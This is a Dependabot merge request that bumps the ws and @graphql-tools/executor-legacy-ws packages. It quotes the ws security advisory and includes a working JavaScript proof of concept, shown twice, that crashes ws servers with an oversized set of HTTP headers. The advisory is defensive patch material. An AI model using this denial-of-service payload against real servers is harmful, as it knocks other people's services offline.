Skip to content

[Security] Bump ws and @graphql-tools/executor-legacy-ws

DependabotCatalogueIndicateurs requested to merge dependabot-npm_and_yarn-ws-and-graphql-tools-executor-legacy-ws-8.17.1 into develop

Bumps ws and @graphql-tools/executor-legacy-ws. These dependencies needed to be updated together. Updates ws from 8.13.0 to 8.17.1 This update includes a security fix.

Vulnerabilities fixed

ws affected by a DoS when handling a request with many HTTP headers

Impact

A request with a number of headers exceeding the[server.maxHeadersCount][] threshold could be used to crash a ws server.

Proof of concept

const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j &lt; chars.length; j++) {
  const key = chars[i] + chars[j];

</tr></table>

... (truncated)

Patched versions: 8.17.1 Affected versions: >= 8.0.0, < 8.17.1

Release notes

Sourced from ws's releases.

8.17.1

Bug fixes

  • Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the[server.maxHeadersCount][] threshold could be used to crash a ws server.

const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j &lt; chars.length; j++) {
  const key = chars[i] + chars[j];
  headers[key] = 'x';
if (++count === 2000) break;
}

}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

In vulnerable versions of ws, the issue can be mitigated in the following ways:

  1. Reduce the maximum allowed length of the request headers using the [--max-http-header-size=size][] and/or the [maxHeaderSize][] options so that no more headers than the server.maxHeadersCount limit can be sent.

... (truncated)

Commits
  • 3c56601 [dist] 8.17.1
  • e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
  • 6a00029 [test] Increase code coverage
  • ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
  • b73b118 [dist] 8.17.0
  • 29694a5 [test] Use the highWaterMark variable
  • 934c9d6 [ci] Test on node 22
  • 1817bac [ci] Do not test on node 21
  • 96c9b3d [major] Flip the default value of allowSynchronousEvents (#2221)
  • e5f32c7 [fix] Emit at most one event per event loop iteration (#2218)
  • Additional commits viewable in compare view

Updates @graphql-tools/executor-legacy-ws from 1.0.1 to 1.0.6

Changelog

Sourced from @​graphql-tools/executor-legacy-ws's changelog.

1.0.6

Patch Changes

1.0.5

Patch Changes

1.0.4

Patch Changes

1.0.3

Patch Changes

1.0.2

Patch Changes

Commits
  • f59d7d7 chore(release): update monorepo packages versions (#5929)
  • 83c0af0 No unnecessary inline fragment spreads for union types in federation and link...
  • a3259da chore(release): update monorepo packages versions (#5763)
  • 38a92ab Use ranged dependencies
  • 701cfd3 fix(deps): update dependency ws to v8.15.0 (#5762)
  • 1bd71cd chore(release): update monorepo packages versions (#5631)
  • 6c26c4f chore(deps): update all non-major dependencies (#5603)
  • 291b37b chore(release): update monorepo packages versions (#5577)
  • b153191 fix(deps): update all non-major dependencies (#5575)
  • b8b8164 chore(release): update monorepo packages versions (#5571)
  • Additional commits viewable in compare view

Merge request reports